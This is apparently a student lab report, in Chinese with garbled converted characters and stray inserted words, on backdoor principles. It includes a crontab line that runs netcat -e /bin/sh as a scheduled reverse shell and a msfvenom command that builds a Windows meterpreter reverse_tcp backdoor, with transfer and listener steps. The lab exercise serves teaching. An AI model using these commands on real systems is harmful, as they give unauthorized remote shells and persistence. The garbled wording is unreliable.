20155213实验二后门原理与实践

时间 2019-12-09

标签实验后门原理实践栏目 Windows 繁體版

原文原文链接

这里须要理解一下cron启动的知识
- cron是一个linux下的定时执行工具，能够在无需人工干预的状况下运行做业。如下是
  
  　　 service crond start //启动服务linux
  
  　　 service crond stop //关闭服务shell
  
  　　 service crond restart //重启服务vim
  
  　　 service crond reload //从新载入配置windows
  
  service crond status //查看服务状态网络
- 操做时通常使用crontab -e指令，此时，须要在用vim打开的文件末尾添加将要自启动的相关指令下图是添加语句遵照的规则
本实验填写进去的指令以下10 17 27 3 * /bin/netcat 192.168.1.102 5213 -e /bin/sh

意思是在3月27号17时10分执行反弹链接到IP为192.168.1.102的计算机上。
在3月27号17时10分以前，打开192.168.1.102机器监听端口为5213

由图能够看出，在10分19秒得到了linux的shell。

生成后门程序：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.161 LPORT=5213 -f exe > 20155213_backdoor.exe
在win下面使用ncat.exe -l 5213 > 20155213_backdoor.exe监听并接受后门程序；
tcp
在Linux下输入nc 192.168.43.252 5213 < 20155213_backdoor.exe向win传输后门程序。
在Linux下使用msfconsole指令，进入msf命令行，并设置LHOST和LPORT，并执行
在win下面运行后门程序，一会后能够发现msf命令行已经成功得到cmd.exe.
工具

（1）例举你能想到的一个后门进入到你系统中的可能方式？命令行

答：后门通常隐藏在正常应用程序之中，甚至官方故意将后门设置在系统中。rest

（2）例举你知道的后门如何启动起来（win及linux）的方式？code

答：能够是绑定到某些程序上，达到自启动

（3）Meterpreter有哪些给你映像深入的功能？

答：主要就是若是后门程序竟然能够在未受权的状况下，得到别人Shell！

（4）如何发现本身的系统有没有被安装后门？

答：查看进程和注册表来发现系统的异常。

20155213实验二 后门原理与实践